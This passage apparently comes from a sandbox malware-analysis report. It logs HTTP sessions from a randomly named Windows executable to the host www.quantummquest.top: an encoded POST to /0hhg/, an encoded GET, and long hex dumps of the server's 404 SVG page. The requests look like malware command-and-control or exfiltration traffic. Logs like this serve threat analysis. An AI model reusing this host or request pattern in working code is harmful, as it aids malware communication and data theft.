                                                                                                    May 2, 2024 08:26:09.023370981 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                                                                    Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                                                                    May 2, 2024 08:26:09.023736000 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                                                                    Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                                                                    May 2, 2024 08:26:09.023888111 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                                                                    Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                                                                    May 2, 2024 08:26:09.023937941 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                                                                    Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                                                                    May 2, 2024 08:26:09.024012089 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                                    Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                                                                    May 2, 2024 08:26:09.024104118 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                                                                    Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                                                                    May 2, 2024 08:26:09.177483082 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                                                                    Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.449756203.161.50.12780916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:11.555306911 CEST10816OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.quantummquest.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.quantummquest.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.quantummquest.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 71 42 45 65 37 59 77 4a 6d 48 49 36 6b 37 45 35 59 63 67 74 71 61 47 33 6b 68 2b 48 43 49 44 38 6b 50 6f 36 38 61 37 6a 49 64 64 42 6c 63 4e 37 46 46 37 67 42 70 4f 64 49 39 53 64 6d 56 4e 51 4b 38 71 76 6b 37 6b 31 6a 43 4a 66 64 56 59 61 62 41 79 4d 50 4b 33 68 45 74 37 67 6c 55 79 35 79 73 74 67 36 2b 44 44 71 55 50 54 34 53 50 4e 6d 54 46 5a 67 2b 4e 54 75 71 71 4e 34 31 6a 5a 6b 39 46 59 39 64 48 43 59 51 50 34 4c 42 6d 59 52 75 76 36 67 67 77 53 5a 54 61 4d 58 71 50 6c 53 4d 78 6a 46 51 67 66 4f 30 67 6c 79 46 71 71 77 50 42 6b 74 59 7a 59 34 4c 38 43 6c 35 79 48 6a 37 53 42 49 70 52 5a 73 4e 74 75 33 41 47 54 76 6c 6f 75 64 45 45 76 62 72 58 76 53 63 61 2b 30 38 61 71 74 4e 46 57 77 4c 2f 44 56 57 37 37 49 73 46 74 53 4c 59 61 6d 6b 42 61 63 68 37 46 49 53 32 30 35 78 5a 37 64 58 58 54 76 42 4b 78 6d 47 6e 31 6a 78 70 79 72 34 33 36 55 53 49 69 36 37 37 73 58 46 6e 66 76 72 44 51 45 49 6b 7a 75 67 43 77 4b 79 42 39 77 69 37 70 30 6a 34 34 78 78 34 30 4a 59 6c 48 7a [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=qBEe7YwJmHI6k7E5YcgtqaG3kh+HCID8kPo68a7jIddBlcN7FF7gBpOdI9SdmVNQK8qvk7k1jCJfdVYabAyMPK3hEt7glUy5ystg6+DDqUPT4SPNmTFZg+NTuqqN41jZk9FY9dHCYQP4LBmYRuv6ggwSZTaMXqPlSMxjFQgfO0glyFqqwPBktYzY4L8Cl5yHj7SBIpRZsNtu3AGTvloudEEvbrXvSca+08aqtNFWwL/DVW77IsFtSLYamkBach7FIS205xZ7dXXTvBKxmGn1jxpyr436USIi677sXFnfvrDQEIkzugCwKyB9wi7p0j44xx40JYlHz9VuDXIam+wabE29lLGp3nFJoIeymumwBfsCO7j9x6EmydOr2JU/feNbu6WYEaOCwy3T7+LSpaG79Xe/jkjRp6rS2bWcq+cqYKceTreBe2r4gNxMPhp25yExcydwkSaqFYXIHMYOiTJjuWQ5s2YLLCifk3jsQQf/2zYroME3yliFSzlbShfJPXL+JgNq01cFmrZiRG58PnQ7f6HEvlh47+tUcap7j3jgmkt23H7uQoujoOWeMdIY3WX9ADhCooOSvtBywLuXJwGjSfSJEHpyTepD+8ol5/3D7cS4tiFFH9358OnHtqEZFju36sVgbtL5nG8sd3Yw9tvyj1HgZggWN01NV2H8TTja6Q9FSlRyiSqpKtBcUBmUsVIdj80F1knLmg9eNBxsUtbrcWNkarHZWDzUzUqbqyNwQHZ/OOhMuFqFj4VvFU12eucPKtpOtiULcD+PB2V+gVEW3Y+3YQIHie4v8e3IuvsOQT3xFH8Ziz/fb+Ic3ViKzZxkuweKLQC0Tg/62DXQOwF2u7rEChLORAQEfX0rPNwkAKdROqH4Rwb4xV55xmiOZDIkzHit0EyDC+cNKJaLmtAbrTu8PWlPFSD0cWqJfjSF+v4/h+k2viJPjEgyZAc9KQQYc1xn2UAijLfqETqkCdeK6eUthoU4unjhyrZjvuPw5oA [TRUNCATED]
                                                                                                    May 2, 2024 08:26:11.729702950 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 02 May 2024 06:26:11 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 16052
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                    May 2, 2024 08:26:11.729774952 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                                                                    Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                                                                    May 2, 2024 08:26:11.729798079 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                                                                    Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                                                                    May 2, 2024 08:26:11.729857922 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                    Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                                                                    May 2, 2024 08:26:11.729924917 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                                                                    Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                                                                    May 2, 2024 08:26:11.729938984 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                                                                    Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                                                                    May 2, 2024 08:26:11.729968071 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                                                                    Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                                                                    May 2, 2024 08:26:11.730003119 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                                                                    Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                                                                    May 2, 2024 08:26:11.730170965 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                                    Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                                                                    May 2, 2024 08:26:11.730211020 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                                                                    Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                                                                    May 2, 2024 08:26:11.885524035 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                                                                    Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.449757203.161.50.12780916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:14.237984896 CEST441OUTGET /0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ HTTP/1.1
                                                                                                    Host: www.quantummquest.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:26:14.403147936 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 02 May 2024 06:26:14 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 16052
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                    May 2, 2024 08:26:14.403198004 CEST1289INData Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20
                                                                                                    Data Ascii: "translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1
                                                                                                    May 2, 2024 08:26:14.403284073 CEST1289INData Raw: 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32
                                                                                                    Data Ascii: 99 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.00
                                                                                                    May 2, 2024 08:26:14.403388023 CEST1289INData Raw: 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22
                                                                                                    Data Ascii: roke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -
                                                                                                    May 2, 2024 08:26:14.403460979 CEST1289INData Raw: 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e
                                                                                                    Data Ascii: ay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14
                                                                                                    May 2, 2024 08:26:14.403562069 CEST1289INData Raw: 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37
                                                                                                    Data Ascii: 23.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.5322
                                                                                                    May 2, 2024 08:26:14.403624058 CEST1289INData Raw: 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69
                                                                                                    Data Ascii: 412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
                                                                                                    May 2, 2024 08:26:14.403702021 CEST1289INData Raw: 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39
                                                                                                    Data Ascii: 6" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.
                                                                                                    May 2, 2024 08:26:14.403817892 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66
                                                                                                    Data Ascii: id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse
                                                                                                    May 2, 2024 08:26:14.403894901 CEST1289INData Raw: 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a
                                                                                                    Data Ascii: 0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170
